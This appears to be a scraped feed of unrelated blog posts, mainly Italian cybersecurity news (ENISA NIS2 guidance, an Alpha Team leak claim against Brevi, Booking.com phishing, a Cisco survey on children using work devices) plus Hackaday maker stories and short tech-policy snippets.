La guida è rivolta a una vasta gamma di entità, tra cui fornitori di servizi cloud, data center, gestori di registri di domini di primo livello, reti di distribuzione di contenuti, provider di marketplace e social network, e mira a sostenere le organizzazioni nell’applicazione dei requisiti tecnici e metodologici previsti dalla Direttiva NIS2. ENISA invita tutte le parti interessate a fornire il proprio feedback per affinare e perfezionare questa guida, rendendola uno strumento pratico, flessibile e in linea con le esigenze reali del settore.
Obiettivi e struttura della Guida Tecnica
La guida ENISA non solo mira a garantire l’adesione agli standard NIS2, ma intende anche offrire alle organizzazioni un supporto concreto per rafforzare la propria resilienza contro le minacce informatiche. Il documento fornisce una combinazione di raccomandazioni operative, esempi di conformità e suggerimenti tecnici, organizzati in quattro elementi chiave per ogni requisito:
- Indicazioni pratiche che guidano le organizzazioni nell’implementazione dei requisiti.
- Esempi di evidenze di conformità per documentare l’aderenza alle misure.
- Suggerimenti extra per andare oltre i requisiti minimi e rafforzare ulteriormente la sicurezza.
- Mappature agli standard: collegamenti con standard internazionali e nazionali come ISO/IEC 27001, NIST CSF, e altri, per favorire una perfetta integrazione con i framework di sicurezza già esistenti.
Essendo un documento in continua evoluzione, la guida sarà aggiornata periodicamente per adattarsi ai cambiamenti nelle normative internazionali e alle nuove minacce informatiche.
Informazioni sul Regolamento di Esecuzione (UE) 2024/2690
Il Regolamento di Esecuzione (UE) 2024/2690, adottato dalla Commissione Europea il 17 ottobre 2024, rappresenta un passo cruciale nell’attuazione della Direttiva (UE) 2022/2555, nota come Direttiva NIS2. Questo regolamento stabilisce requisiti tecnici e metodologici dettagliati per le misure di gestione dei rischi di cybersicurezza e specifica i criteri per determinare quando un incidente debba essere considerato significativo.
Il regolamento si applica a una vasta gamma di entità, tra cui fornitori di servizi DNS, registri dei nomi di dominio di primo livello, fornitori di servizi di cloud computing, data center, reti di distribuzione dei contenuti, mercati online, motori di ricerca, piattaforme di social network e fornitori di servizi fiduciari.
Principali requisiti tecnici e metodologici:
- Politiche di sicurezza: definizione di politiche chiare per la sicurezza dei sistemi di rete e informazione.
- Gestione del rischio: implementazione di processi strutturati per identificare, valutare e mitigare i rischi di cybersicurezza.
- Gestione degli incidenti: procedure di rilevamento, gestione e notifica degli incidenti di sicurezza.
- Continuità operativa: piani per garantire la continuità dei servizi anche in caso di incidenti significativi.
- Sicurezza della catena di fornitura: misure specifiche per gestire i rischi associati ai fornitori e alle terze parti.
- Igiene informatica e formazione: programmi di sensibilizzazione e formazione per il personale sulle pratiche di sicurezza.
- Cifratura e controllo degli accessi: tecniche avanzate di cifratura e autenticazione per proteggere i dati critici.
Il regolamento fornisce anche criteri specifici per determinare quando un incidente deve essere considerato significativo, basandosi su fattori come il numero di utenti interessati, la durata dell’incidente, la portata geografica, l’impatto sui servizi e le conseguenze economiche e sociali. Questi criteri aiutano le organizzazioni a valutare l’importanza di un incidente e a determinare le azioni appropriate da intraprendere, inclusa la notifica tempestiva alle autorità competenti.
L’adozione di questo regolamento impone alle organizzazioni di rivedere e aggiornare le proprie misure di sicurezza per conformarsi ai nuovi requisiti, inclusa l’adozione di policy e procedure aggiornate, la formazione del personale e l’implementazione di tecnologie di sicurezza avanzate. Per ulteriori dettagli, il regolamento è consultabile su EUR-Lex.
Le aree di intervento chiave
La guida ENISA copre tredici aree tematiche, considerate essenziali per la sicurezza informatica delle organizzazioni moderne. Di seguito, una panoramica dettagliata di ciascun pilastro:
- Politica di sicurezza dei sistemi di rete e informazione: Ogni organizzazione deve disporre di una policy di sicurezza che delinei chiaramente l’approccio e gli obiettivi di cybersicurezza. La guida raccomanda che questa policy sia allineata con la strategia di business e approvata dalla dirigenza. Tra gli elementi da includere, vi sono l’allocazione delle risorse necessarie, la definizione dei ruoli e delle responsabilità e un piano di miglioramento continuo della sicurezza. È inoltre importante che la policy sia comunicata sia al personale interno che ai fornitori esterni.
- Gestione del rischio: ENISA sottolinea la necessità per le organizzazioni di adottare un framework di gestione del rischio per identificare, valutare e mitigare le minacce. La guida suggerisce un piano di trattamento del rischio che documenti ogni rischio rilevato e le misure specifiche per affrontarlo, tenendo conto delle risorse aziendali e del contesto operativo. La revisione periodica del piano è fondamentale per rispondere ai cambiamenti nel panorama delle minacce.
- Gestione degli incidenti: Una delle aree più critiche per la sicurezza, la gestione degli incidenti, richiede una policy strutturata che assegni ruoli specifici e definisca procedure chiare per l’identificazione, l’analisi, la risposta e il recupero da eventi di sicurezza. ENISA consiglia di stabilire una classificazione degli incidenti che aiuti a determinare rapidamente la gravità di ogni evento e a stabilire piani di escalation e comunicazione per una risposta coordinata e tempestiva.
- Continuità operativa e gestione delle crisi: La guida sottolinea l’importanza di avere piani solidi per garantire la continuità operativa anche durante le crisi. ENISA incoraggia l’adozione di piani di business continuity e di disaster recovery, che comprendano strategie di backup, piani per il ripristino dei dati e per la gestione delle crisi. È essenziale che tali piani siano testati regolarmente e aggiornati alla luce delle lezioni apprese da incidenti precedenti.
- Sicurezza della catena di fornitura: Con l’aumento dell’esternalizzazione e della dipendenza dai fornitori, il documento evidenzia l’importanza di avere una policy specifica per la gestione dei rischi della supply chain. La guida raccomanda di tenere traccia dei fornitori, valutare i rischi associati a ciascuno di essi e integrare requisiti di sicurezza nei contratti per limitare le vulnerabilità derivanti dalle terze parti.
- Acquisizione e sviluppo sicuro dei sistemi: La sicurezza deve essere integrata fin dalla progettazione di nuovi sistemi IT. ENISA consiglia di seguire un ciclo di sviluppo sicuro, che includa pratiche di gestione della configurazione, testing di sicurezza, e applicazione delle patch. L’obiettivo è assicurare che ogni sistema implementato sia adeguatamente protetto contro le minacce emergenti.
- Monitoraggio e controllo dell’efficacia delle misure di sicurezza: La guida raccomanda procedure per valutare regolarmente l’efficacia delle misure di sicurezza adottate. Questo può includere l’esecuzione di audit, test di penetrazione e altre attività di monitoraggio, con l’obiettivo di individuare tempestivamente eventuali lacune e migliorare le difese.
- Cyber igiene e formazione del personale: La formazione continua è essenziale per ridurre i rischi derivanti da errori umani. ENISA incoraggia l’adozione di pratiche di cyber igiene di base e di programmi di sensibilizzazione per rendere i dipendenti consapevoli delle principali minacce informatiche e delle procedure di sicurezza.
- Cifratura e controllo degli accessi: La protezione dei dati sensibili passa attraverso l’adozione di tecniche di cifratura e l’implementazione di meccanismi di autenticazione robusti. La guida raccomanda l’utilizzo di autenticazione multifattore e il controllo rigoroso degli accessi ai dati e ai sistemi, per limitare al minimo i rischi di accesso non autorizzato.
- Gestione delle risorse e degli asset: ENISA raccomanda l’adozione di politiche per la classificazione, gestione e protezione degli asset aziendali, inclusi i dispositivi mobili e i supporti rimovibili. È essenziale tenere un inventario accurato e adottare misure per proteggere gli asset durante tutto il loro ciclo di vita.
- Sicurezza fisica e ambientale: Oltre alla protezione digitale, la guida suggerisce misure di sicurezza fisica, come il controllo degli accessi alle strutture e la protezione contro minacce ambientali, per assicurare che i sistemi critici siano protetti anche da rischi non digitali.
- Criptografia avanzata: L’uso di tecnologie crittografiche è fondamentale per la protezione dei dati sensibili e la guida offre raccomandazioni sulle migliori pratiche per implementare la crittografia sia per i dati in transito che per quelli in archiviazione.
- Controllo degli accessi e gestione dei privilegi: La gestione degli accessi è cruciale per proteggere le risorse critiche. ENISA suggerisce di implementare controlli rigorosi sugli accessi e di monitorare attentamente l’uso degli account con privilegi elevati, adottando politiche chiare per garantire che solo le persone autorizzate possano accedere alle informazioni sensibili.
L’importanza della partecipazione pubblica
ENISA riconosce che il successo di questa guida dipende dal contributo delle organizzazioni e dei professionisti del settore, ed è per questo che invita alla partecipazione attiva di tutti gli stakeholder. La consultazione pubblica rappresenta un’opportunità per le organizzazioni di influenzare il contenuto della guida, garantendo che essa sia applicabile e adeguata alle esigenze operative del settore.
Le organizzazioni interessate possono consultare il documento sul sito dell’ENISA e presentare il loro feedback, contribuendo così alla costruzione di un cyberspazio europeo più sicuro e resiliente. Questa fase di feedback permetterà all’ENISA di affinare il documento finale, trasformandolo in uno strumento pratico e aggiornato per affrontare le sfide future della cybersicurezza
L'articolo ENISA avvia la consultazione pubblica: Guida tecnica per rafforzare le misure di cybersicurezza delle organizzazioni europee proviene da il blog della sicurezza informatica.
Torna Trump, ecco cosa cambia nei rapporti Usa-Cina
@Notizie dall'Italia e dal mondo
Duro sui dazi e debole su Taiwan: in quattro anni di presidenza Trump, Pechino potrà recuperare 40 anni su Washington
L'articolo Torna Trump, ecco cosa cambia nei rapporti Usa-Cina proviene da Pagine Esteri.
Notizie dall'Italia e dal mondo reshared this.
Teaching a Pi Pico E-Ink Panel New Tricks
We’ve noticed that adding electronic paper displays to projects is getting easier. [NerdCave] picked up a 4.2-inch E-ink panel but found its documentation a bit lacking when it came to using the display under MicroPython. Eventually he worked it out, and was kind enough to share with the rest of the class.
These paper-like displays draw little power and can hold static images. There were examples from the vendor of how to draw some simple objects and text, but [NerdCave] wanted to do graphics. There was C code to do it, but it wasn’t clear how to port it to Python.
The key was to use the image2cpp website (we’ve used it before, but you can also use GIMP). Instead of C code, though, you get the raw bytes out and place them in your Python code. Once you know the workflow, it isn’t that hard, and this is an inexpensive way to add a different kind of display to your projects. The same image conversion will help you work with other displays, too.
We aren’t sure what driver chip this particular display uses, but if you have one with the UC8151/IL0373, you can find some amazing MicroPython drivers for those chips.
youtube.com/embed/RGil4N-uiQw?…
Alpha Team rivendica un attacco informatico all’italiana Brevi nelle Underground criminali
Recentemente, il gruppo di threat actors noto come Alpha Team ha rivendicato su un forum underground un attacco contro l’azienda italiana Brevi, uno dei principali distributori nel settore dell’Information Technology.
Secondo quanto pubblicato nel forum, il gruppo criminale avrebbe acquisito l’accesso ad un database della società, esponendo informazioni sensibili.
Attualmente, non siamo in grado di confermare l’accuratezza delle informazioni riportate da Alpha team, poiché non è stato rilasciato ancora alcun comunicato stampa ufficiale sul sito web di Brevi riguardo all’incidente, pertanto questa informazione è da ritenere come fonte di “intelligence”.
Nel forum underground, Alpha Team ha pubblicato un post dettagliato riguardante la presunta violazione, presentando vari link ai database e fornendo esempi di tabelle compromesse. Tra le informazioni mostrate, ci sono tabelle come “UTENTI” che potrebbero contenere dati personali e aziendali.
Chi è Alpha Team?
Alpha Team è un gruppo di cybercriminali esperti, noto per colpire aziende italiane di medie e grandi dimensioni attraverso attacchi di tipo ransomware e data leak. Gli obiettivi principali del gruppo includono aziende che, secondo il loro leader Z0rg, non implementano adeguate misure di sicurezza nonostante operino nel settore IT. La loro strategia prevede il furto e la pubblicazione di dati sensibili su forum underground nel caso le vittime rifiutino di pagare un “riscatto” o una sorta di “contributo per la sicurezza.”
Alpha Team giustifica i propri attacchi come un modo per “educare” le aziende alle migliori pratiche di sicurezza, benché lo scopo sia principalmente economico. In una intervista su Red Hot Cyber, il presunto leader di Alpha Team, Z0rg, ha affermato che il loro operato mira a dimostrare le falle nei sistemi di sicurezza delle aziende italiane.
Le vittime, come Brevi, si trovano spesso costrette a scegliere tra il pagamento e il rischio di un danno reputazionale e finanziario ancora più elevato, a causa della diffusione dei dati rubati.
L’Impatto sull’Industria Italiana
L’attacco a Brevi non è un caso isolato, ma parte di una serie di azioni mirate contro il settore IT italiano. Alpha Team ha già preso di mira altre aziende del settore mettendo in evidenza una vulnerabilità sistemica: una sicurezza informatica non correttamente applicata da moltissime aziende italiane.
L’attività del gruppo rappresenta un serio rischio per la continuità operativa e la sicurezza delle informazioni delle imprese italiane, che possono subire gravi danni economici e d’immagine se non riescono a rispondere adeguatamente a queste minacce.
L’incidente che ha coinvolto Brevi sottolinea la necessità di rafforzare le difese informatiche nelle aziende italiane, specialmente nel settore IT. Alpha Team continua a rappresentare una minaccia persistente per le imprese che non adottano misure di sicurezza avanzate, dimostrando quanto sia vulnerabile il tessuto aziendale italiano agli attacchi cyber.
Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.
RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.
L'articolo Alpha Team rivendica un attacco informatico all’italiana Brevi nelle Underground criminali proviene da il blog della sicurezza informatica.
Quando nasce davvero la coscienza? Se non lo sappiamo per l’uomo, come possiamo dirlo per un’IA?
Il neuroscienziato di Tubinga Joel Frohlich si chiede: “Quando si accende per la prima volta la scintilla della coscienza umana?” Questa domanda è molto difficile per diversi motivi.
Innanzitutto, il concetto stesso di coscienza umana è vago e difficile da definire ai fini di tale ricerca. Sappiamo tutti di avere una coscienza, ma sorgono difficoltà quando cerchiamo di prenderne le distanze e di parlarne. È come cercare di descrivere oggettivamente le esperienze soggettive: un compito non facile nemmeno per scienziati esperti.
In secondo luogo, come osserva il neuroscienziato Christoph Koch, i bambini, sia nati che nel grembo materno, trascorrono la maggior parte del loro tempo in uno stato di sonnolenza. Ma da ciò non si può concludere che siano privi di coscienza. Il sonno non è la stessa cosa dell’assenza di pensiero; è solo distacco dal livello ordinario di percezione sensoriale.
Frohlich condivide i suoi pensieri su come affrontare questa domanda, sulla base di una recente revisione scientifica di cui è coautore.
La coscienza sorge dopo la nascita? La ricerca non ha ancora fornito una risposta chiara a questa domanda. Frohlich afferma che le analisi dell’attività elettrica cerebrale indicano un aumento della complessità neurale nel primo periodo postpartum, ma lui e i suoi colleghi hanno trovato prove del contrario. Naturalmente non tutta la complessità è funzionale; una parte di esso probabilmente rappresenta solo uno stato disordinato, che gradualmente si rimette in ordine. In altre parole, non tutta la maggiore complessità dell’attività cerebrale documentata dalla ricerca riflette necessariamente lo sviluppo delle capacità coscienti. E queste lunghe discussioni sono un altro vicolo cieco.
Gli scettici spesso dubitano che i neonati siano coscienti, citando l’impossibilità di avere un sé nell’infanzia: come può un bambino piccolo avere un’idea di sé stesso? Ma questa è una confusione di concetti. La presenza dell’esperienza non richiede l’esistenza obbligatoria dell’io, cioè della personalità. Da adulti, spesso ci perdiamo immergendoci in qualcosa, che si tratti di profonda ispirazione creativa, musica, esercizio fisico, lavoro o intimità. Simili stati senza ego si verificano anche durante la meditazione. Affermare che questi siano stati senza coscienza è assurdo. La coscienza non ha necessariamente bisogno di un “io”.
Frohlich suggerisce di considerare la nascita come un evento che “accende” la coscienza, necessaria per l’adattamento al nuovo ambiente postpartum. Se assumiamo che la coscienza serva a scopi pratici e non sia solo un sottoprodotto del cervello, allora c’è motivo di credere che nasca proprio alla nascita. Il neonato lascia l’ambiente sicuro del grembo materno e il bisogno del corpo di un’esistenza autonoma può creare un bisogno di consapevolezza e di esperienza soggettiva.
La capacità dei neonati di formarsi aspettative sul mondo che li circonda può essere la prova che sviluppano la coscienza fin dalla nascita. Alcuni neuroscienziati, come Anil Seth, aderiscono al concetto di “codificazione predittiva” della coscienza. Secondo questo punto di vista, la coscienza non nasce semplicemente dal flusso di dati sensoriali che entrano nel nostro cervello, ma piuttosto dalle nostre inferenze sulla realtà circostante. Queste inferenze si basano sia su nuove informazioni sensoriali che sulle nostre idee precedenti su come funziona il mondo.
In sintesi, ancora risulta poco chiaro il concetto di “coscienza” umano. Come possiamo quindi dire se una intelligenza artificiale è cosciente?
L'articolo Quando nasce davvero la coscienza? Se non lo sappiamo per l’uomo, come possiamo dirlo per un’IA? proviene da il blog della sicurezza informatica.
Dispositivi aziendali e bambini: i rischi nascosti della condivisione digitale!
Si parla spesso del rapporto dei bambini con i dispositivi digitali. Anche dopo la circolare del Ministero dell’Istruzione e del Merito, guidato da Giuseppe Valditara, che introduce il divieto di utilizzo dei cellulari in classe, dall’infanzia fino alle medie, anche per scopi educativi e didattici. Ma i pericoli per la sicurezza dei bambini e dei dati si limitano all’uso dei cellulari a scuola? No! come vedremo, i pericoli più insidiosi possono nascondersi anche tra le mura domestiche, nei dispositivi dei genitori.
Un nuovo sondaggio Cisco mette in luce i rischi per la sicurezza derivanti dalla condivisione dei dispositivi aziendali con i propri figli.
Cisco, azienda leader nel settore tecnologico, ha recentemente condotto un sondaggio tramite Censuswide su 6116 genitori lavoratori di età superiore ai 18 anni di diversi Paesi europei ed extraeuropei (Regno Unito, Francia, Spagna, Svizzera, Italia, Polonia, Paesi Bassi, Svezia, Sudafrica, Emirati Arabi Uniti, Arabia Saudita e Germania) tra il 30 luglio e l’8 agosto 2024. Lo studio ha evidenziato come la condivisione dei dispositivi digitali, in particolare quelli utilizzati per lavoro, sia una pratica molto diffusa, nonostante i potenziali rischi per la sicurezza.
I risultati del sondaggio
Un terzo dei bambini ha accesso al dispositivo del genitore. Spesso l’utilizzo avviene senza supervisione e conoscendone i codici di accesso. Il 33% dei bambini accede ai dispositivi lavorativi dei genitori e solo il 24% degli intervistati dichiara di adottare l’autenticazione a due fattori (2FA) come misura di sicurezza. Un dato allarmante, considerando che questi dispositivi possono contenere informazioni aziendali sensibili.
La situazione in Italia
Secondo il sondaggio, la situazione in Italia è allarmante. 8 genitori su 10 hanno dichiarato di aver condiviso il proprio dispositivo lavorativo con almeno un figlio negli ultimi sei mesi. Inoltre, solo il 17% degli intervistati utilizza l’autenticazione a più fattori (MFA) per le attività lavorative più critiche, mentre meno della metà si affida ad una VPN. Ancora più bassa la percentuale di intervistati 38% che si affida a password considerate “forti”.
In un mondo in cui un numero crescente di dispositivi presenti nelle case sono connessi alla rete e condivisi tra i membri della famiglia diventa fondamentale utilizzare le migliori pratiche per garantire la massima sicurezza dei dati e dei propri dispositivi digitali. Tra queste buone pratiche ci sono: aggiornamenti regolari; password forti; attenzione ai link e agli allegati sospetti; software antivirus e anti-malware; backup regolari; rete wi-fi sicura; navigazione sicura. Tutte precauzioni indispensabili per proteggere dati aziendali, privacy e la sicurezza di tutta la famiglia.
I consigli degli esperti
Martin Lee, membro del Cisco Talos EMEA Lead, un gruppo di ricerca leader sulle minacce informatiche, sottolinea i rischi legati all’accesso non autorizzato ai dati aziendali: “Qualsiasi accesso non autorizzato a dati riservati costituisce una potenziale violazione. La mancanza di controllo da parte dei genitori quando i figli utilizzano i dispositivi aziendali introduce ulteriori rischi, come la possibilità di inviare o cancellare involontariamente dei dati o di commettere errori nella gestione della posta elettronica.”
Come proteggere i dispositivi aziendali
Per mitigare questi rischi, gli esperti di Cisco Talos suggeriscono alcune best practice:
- Creare account guest: Consentono ai familiari di utilizzare il dispositivo in modo limitato, senza accesso completo ai sistemi e ai dati aziendali.
- Adottare l’autenticazione a più fattori (MFA): Proteggere l’accesso alle applicazioni e ai sistemi aziendali con MFA o 2FA, utilizzando anche il riconoscimento biometrico.
- Utilizzare una VPN: Proteggere i dati sensibili rendendoli accessibili solo tramite VPN e richiedendo l’autenticazione MFA/2FA.
- Effettuare backup regolari: Proteggere i dati da eventuali danni al dispositivo (cadute, liquidi, ecc.) effettuando backup periodici.
- Educare alla sicurezza informatica: Sensibilizzare i familiari sui rischi legati all’uso dei dispositivi digitali e alle minacce informatiche.
- Definire politiche aziendali chiare: Implementare politiche aziendali che definiscano le responsabilità degli utenti in caso di violazioni della sicurezza.
In un mondo in cui il confine tra vita professionale e vita privata è sempre più sfumato, proteggere i dispositivi aziendali con misure di sicurezza efficaci è ormai indispensabile per garantire la sicurezza di dati sensibili e la serenità di tutta la famiglia.
L'articolo Dispositivi aziendali e bambini: i rischi nascosti della condivisione digitale! proviene da il blog della sicurezza informatica.
Phishing per le Vacanze! Come i Truffatori Derubano i Turisti su Booking.com
I truffatori informatici hanno trovato un nuovo modo per guadagnare denaro dai turisti utilizzando il popolare servizio di prenotazione Booking.com. Recentemente, in California, gli hacker hanno compromesso l’account di un hotel, cosa che ha permesso loro di lanciare un attacco di phishing. La vittima era un cliente che aveva appena prenotato una camera e ha ricevuto un messaggio tramite l’app di Booking.com che gli chiedeva di confermare i suoi dati, presumibilmente per completare la prenotazione. Il messaggio sembrava convincente poiché conteneva il nome dell’hotel e le informazioni sulla sua prenotazione.
Messaggio di phishing ( KrebsOnSecurity )
Booking.com ha confermato l’accaduto, aggiungendo che gli aggressori hanno avuto accesso ai dati grazie ad un attacco informatico nel sistema di uno dei suoi partner. Non ci sono state perdite nel sistema di Booking.com stesso.
In seguito all’incidente, Booking.com ha rafforzato le proprie misure di sicurezza e ha introdotto l’autenticazione a due fattori (2FA) obbligatoria per tutti i partner. Per accedere ai dettagli di pagamento ora è necessario inserire un codice monouso dall’app di autenticazione mobile. Tuttavia, i criminali stanno trovando modi per aggirare la sicurezza infettando i computer dei partner con malware per ottenere l’accesso agli account e inviare messaggi di phishing ai clienti.
Sito di phishing che si apre quando si fa clic su un collegamento in un messaggio di testo ( KrebsOnSecurity )
L’analisi dei social network ha dimostrato che tali schemi sono comuni non solo tra gli hotel, ma anche su altre piattaforme popolari.
Nel 2023, SecureWorks ha registrato un aumento degli attacchi malware volti a rubare dati dai partner di Booking.com. Secondo SecureWorks, gli attacchi sono iniziati nel marzo 2023 quando un hotel non ha abilitato l’autenticazione a più fattori, rendendo più semplice per i criminali informatici ottenere l’accesso all’account.
Nel giugno 2024, Booking.com ha segnalato un aumento del 900% degli attacchi di phishing, attribuito all’uso dell’intelligenza artificiale per creare schemi più efficaci. In risposta, l’azienda ha implementato soluzioni proprietarie di intelligenza artificiale che hanno bloccato 85 milioni di prenotazioni fraudolente e contrastato oltre 1,5 milioni di tentativi di phishing nel 2023.
Ulteriori indagini hanno rivelato che il dominio del sito Web falso inviato al cliente – guestsecureverification[.]com – era registrato con un indirizzo e-mail utilizzato per creare più di 700 domini di phishing destinati a servizi alberghieri e altre piattaforme popolari come Shopify e Steam.
La richiesta di account Booking.com compromessi rimane elevata tra i criminali informatici. I forum degli hacker offrono attivamente dati rubati, nonché servizi per monetizzare gli account compromessi. Alcuni criminali creano addirittura “le proprie agenzie di viaggio”, offrendo ai truffatori sconti sulle prenotazioni alberghiere.
SecureWorks ha scoperto che i phisher utilizzano malware per rubare le credenziali, ma oggi i criminali devono semplicemente acquistare le credenziali rubate sul mercato nero, soprattutto se i servizi non richiedono 2FA. Ciò è confermato dal caso della piattaforma cloud Snowflake, dove sono stati utilizzati account vulnerabili per rubare dati a più di 160 aziende.
L'articolo Phishing per le Vacanze! Come i Truffatori Derubano i Turisti su Booking.com proviene da il blog della sicurezza informatica.
Help Wanted: Keep the World’s Oldest Windmills Turning
While the Netherlands is the country most known for its windmills, they were originally invented by the Persians. More surprisingly, some of them are still turning after 1,000 years.
The ancient world holds many wonders of technology, and some are only now coming back to the surface like the Antikythera Mechanism. Milling grain with wind power probably started around DATE in Persia, but in Nashtifan, Iran they’ve been keeping the mills running generation-to-generation for over 1000 years. [Mohammed Etebari], the last windmill keeper is in need of an apprentice to keep them running though.
In a world where vertical axis wind turbines seem like a new-fangled fad, it’s interesting to see these panemone windmills are actually the original recipe. The high winds of the region mean that the timber and clay structure of the asbad structure housing the turbine is sufficient for their task without all the fabric or man-made composites of more modern designs. While drag-type turbines aren’t particularly efficient, we do wonder how some of the lessons of repairability might be used to enhance the longevity of modern wind turbines. Getting even 100 years out of a turbine would be some wicked ROI.
Wooden towers aren’t just a thing of the past either, with new wooden wind turbines soaring 100 m into the sky. Since you’ll probably be wanting to generate electricity and not mill grain if you made your own, how does that work anyway?
youtube.com/embed/HCQoLCcJBN0?…
Using AI To Help With Assembly
Although generative AI and large language models have been pushed as direct replacements for certain kinds of workers, plenty of businesses actually doing this have found that using this new technology can cause more problems than it solves when it is given free reign over tasks. While this might not be true indefinitely, the real use case for these tools right now is as a kind of assistant to certain kinds of work. For this they can be incredibly powerful as [Ricardo] demonstrates here, using Amazon Q to help with game development on the Commodore 64.
The first step here was to generate code that would show a sprite moving across the screen. The AI first generated code in all caps, as was the style at the time of the C64, but in [Ricardo]’s development environment this caused some major problems, so the code was converted to lowercase. A more impressive conversion was done in the next steps, as the program needed to take advantage of the optimizations found in the Assembly language. With the code converted to 6502 Assembly that can run on the virtual Commodore, [Ricardo] was eventually able to show four sprites moving across the screen after several iterations with the AI, as well as change the style of the sprites to arbitrary designs.
Although the post is a bit over-optimistic on Amazon Q as a tool specifically for developers, it might have some benefits over other generative AIs especially if it’s capable at the chore of programming in Assembly language. We’d love to hear anyone with real-world experience with this and whether it is truly worth the extra cost over something like Copilot or GPT 4. For any of these generative AI models, though, it’s probably worth trying them out while they’re in their early stages. Keep in mind that there’s a lot more than programming that can be done with some of them as well.
DIY Lock Nuts
If you have a metal lathe just looking for some work, why not make your own lock nuts? That’s what [my mechanics insight] did when faced with a peculiar lock nut that needed replacing in a car. We can’t decide what we enjoyed more in the video you can watch below: the cross-section cut of a lock nut or the oddly calming videos of the new nut being turned on a lathe.
The mystery of the lock nut, though, isn’t how it works. The nylon insert is just a little too small for the bolt, and the bolt, being harder than nylon, taps a very close-fitting hole in the nylon as you tighten it. The real mystery is how that nylon got in there to start with.
As the video shows, you fabricate the nut with an open area to accept the nylon ring. Then, you use a tool to crimp the edges down to trap the ring. The video shows all the pieces being made: the nut, the ring, and the crimping tool.
As you might deduce, the crimping tool has to be harder than the nut material, so that takes some extra effort. But all the work is done on the lathe except the crimping. He uses a vise, but we’d imagine that an arbor press is more commonly used.
Lock washers and nuts seem like a simple topic, but it is way more complex than you probably thought. Way more complex.
Thanks to [the gambler] for the tip!
youtube.com/embed/otc2hwnTdYw?…
South Korea's ‘4B’ Movement Goes Viral in US After Trump Elected
No heterosexual marriage, childbirth, dating, or sex with menJules Roscoe (404 Media)
Disposable Vape Batteries Power eBike
There are a lot of things that get landfilled that have some marginal value, but generally if there’s not a huge amount of money to be made recycling things they won’t get recycled. It might not be surprising to most that this is true of almost all plastic, a substantial portion of glass, and even a lot of paper and metals, but what might come as a shock is that plenty of rechargeable lithium batteries are included in this list as well. It’s cheaper to build lithium batteries into one-time-use items like disposable vape pens and just throw them out after one (or less than one) charge cycle, but if you have some spare time these batteries are plenty useful.
[Chris Doel] found over a hundred disposable vape pens after a local music festival and collected them all to build into a battery powerful enough for an ebike. Granted, this involves a lot of work disassembling each vape which is full of some fairly toxic compounds and which also generally tend to have some sensitive electronics, but once each pen was disassembled the real work of building a battery gets going. He starts with testing each cell and charging them to the same voltage, grouping cells with similar internal resistances. From there he assembles them into a 48V pack with a battery management system and custom 3D printed cell holders to accommodate the wide range of cell sizes. A 3D printed enclosure with charge/discharge ports, a power switch, and a status display round out the build.
With the battery bank completed he straps it to his existing ebike and hits the trails, easily traveling 20 miles with barely any pedal input. These cells are only rated for 300 charge-discharge cycles which is on par for plenty of similar 18650 cells, making this an impressive build for essentially free materials minus the costs of filament, a few parts, and the sweat equity that went into sourcing the cells. If you want to take an ebike to the next level of low-cost, we’d recommend pairing this battery with the drivetrain from the Spin Cycle.\
Thanks to [Anton] for the tip!
youtube.com/watch?v=VcVp9T8f_W…
Digital leadership underpins Europe’s competitive reformation, connectivity is key [Promoted content] [Advocacy Lab Content]
Europe’s electronic communications operators have an essential role to play in achieving the EU’s ambitions for digital leadership, industrial competitiveness – but the sector is also a driver for social inclusion and ecological transition.
Police Freak Out at iPhones Mysteriously Rebooting Themselves, Locking Cops Out
Law enforcement believe the activity, which makes it harder to then unlock the phones, may be due to a potential update in iOS 18 which tells nearby iPhones to reboot if they have not been in contact with a cellular network for some time, according t…Joseph Cox (404 Media)
Wide telecoms reform is needed to drive connectivity, innovation in sustainable digital decade [Advocacy Lab Content]
The telecommunications sector needs substantial investment and regulatory reforms to meet the European Union’s digital and sustainability targets. Nicolas Guérin, President of the French Telecoms Federation (FFTélécoms), spoke with Euractiv’s Xhoi Zajmi.
Visualise statistics about your account with multiple new tools, Bridgy Fed discusses governance, and further integration of the ATmosphere ecosystem with 3p clients
One of the main goals of writing this newsletter is not only to share links, but more importantly, to give context to help you make sense of what is happening in the world of decentralised social networks.
2023 Hackaday Supercon: One Year of Progress for Project Boondock Echo
Do you remember the fourth-place winner in the 2022 Hackaday Prize? If it’s slipped your mind, that’s okay—it was Boondock Echo. It was a radio project that aimed to make it easy to record and playback conversations from two-way radio communications. The project was entered via Hackaday.io, the judges dug it, and it was one of the top projects of that year’s competition.
The project was the brainchild of Mark Hughes and Kaushlesh Chandel. At the 2023 Hackaday Supercon, Mark and Kaushlesh (KC) came back to tell us all about the project, and how far it had come one year after its success in the 2022 Hackaday Prize.
Breaker, Breaker
youtube.com/embed/rg8EBrH9bMU?…
The talk begins with a simple video explainer of the Boondock Echo project. Basically, it points out the simple problem with two-way radio communications. If you’re not sitting in front of the receiver at the right time, you’re going to miss the message someone’s trying to send you. Unlike cellular communications, Skype calls, or email, there’s no log of missed calls or messages waiting for you. If you weren’t listening, you’re out of luck.The device works with conventional amateur radios and can capture messages, store them in the cloud, and even react to them.
Mark was inspired to create a device to solve these problems by his father’s experience as an emergency responder with FEMA. Often, his father would tell stories about problems with radios and missed transmissions, and Mark had always wondered if something could be done.
Boondock Echo is the device that hopes to change all that. It’s a device designed for recording and playback of two-way radio communications. The hardware is based around the ESP32, which is able to capture analog audio from a radio, digitize it, and submit it to the Boondock Echo online service. This also enables more advanced features—the system can transcribe audio to text, and even do keyword monitoring on the results and email you any important relevant messages.The Boondock Echo service can be set up to react to keywords and provide notifications in turn.
Rather amazingly, Hackaday actually helped spawn this project. Mark had an idea of what Boondock Echo should do, but he didn’t feel like he had the full set of technical skills to implement it. Then, Mark met KC via a Hackaday Hackchat, and the two started a partnership to develop the project further. Eventually, they won fourth place in the 2022 Hackaday Prize, which netted them a tasty $10,000 which they could use to develop the project further. They then brought in Mark’s friend Jesse on the hardware side, and things really got rolling.
